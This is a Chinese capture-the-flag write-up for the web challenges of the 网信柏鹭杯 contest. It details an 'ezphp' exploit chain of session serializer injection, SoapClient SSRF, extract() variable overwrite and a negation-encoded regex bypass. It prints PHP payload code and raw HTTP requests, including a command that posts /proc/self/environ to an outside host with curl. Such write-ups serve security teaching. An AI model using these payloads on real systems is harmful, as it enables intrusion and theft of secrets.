网信柏鹭杯web部分 by Sakura

sakura writeup

签到

一个跳转 curl完事

web

ezphp

利用回调函数覆盖session序列化引擎为php_serilaze,构造SSRF的Soap类的序列化字符串配合序列化注入写入session文件,然后利用变量覆盖漏洞,覆盖掉变量b为回调函数call_user_func,此时结合我刚开始所说的回调函数调用Soap类的未知方法,触发__call方法进行SSRF访问flag.php

利用取反绕过正则过滤,造成RCE。

1
2
3
4
5
6
7
8
<?php
    $str = 'cat /proc/self/environ | curl -H "Content-Type: application/json" -X POST --data-binary @- ip';
    $shell = urlencode(~$str);
    $url = "http://127.0.0.1/flag.php?i=(~%8C%86%8C%8B%9A%92)(~$shell);";
    echo $url."\r\n\r\n";
    $slen = strlen($url);
    $a = '|O:10:"SoapClient":3:{s:3:"uri";s:'.$slen.':"'.$url.'";s:8:"location";s:'.$slen.':"'.$url.'";s:13:"_soap_version";i:1;}';
    echo urlencode($a);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php?f=session_start&name=上面生成的 HTTP/1.1
Host: 8.130.177.132:15294
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=bbb
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31


serialize_handler=php_serialize
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /index.php?f=extract&name=SoapClient HTTP/1.1
Host: 8.130.177.132:15294
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=bbb
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 16


b=call_user_func

读一下环境变量 cat /proc/self/environ

1
PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgiUSER=www-dataHOSTNAME=838bfba2cdd2PHP_INI_DIR=/usr/local/etc/phpSHLVL=2HOME=/home/www-dataPHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -piePHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2PHP_MD5=PHP_VERSION=7.0.33GPG_KEYS=1A4E8B7277C42E53DBA9C7B9BCAA30EA9C0D5763 6E4F6AB321FDC07F2C332E3AC2BF0BC433CFC8B3PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2PHP_ASC_URL=https://secure.php.net/get/php-7.0.33.tar.xz.asc/from/this/mirrorPHP_URL=https://secure.php.net/get/php-7.0.33.tar.xz/from/this/mirrorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binPHPIZE_DEPS=autoconf 		dpkg-dev dpkg 		file 		g++ 		gcc 		libc-dev 	      make 		pkgconf 		re2cPWD=/var/www/htmlPHP_SHA256=ab8c5be6e32b1f8d032909dedaaaa4bbb1a209e519abb01a52ce3914f9a13d96FLAG=flag{ISEC-0e165f5593f2246bc53b395b7810c220}
WriteUp
网信柏鹭杯web部分 by Sakura
https://qiuye.ink/pages/edcfd0/
作者
Akiba
发布于
2021年10月29日
许可协议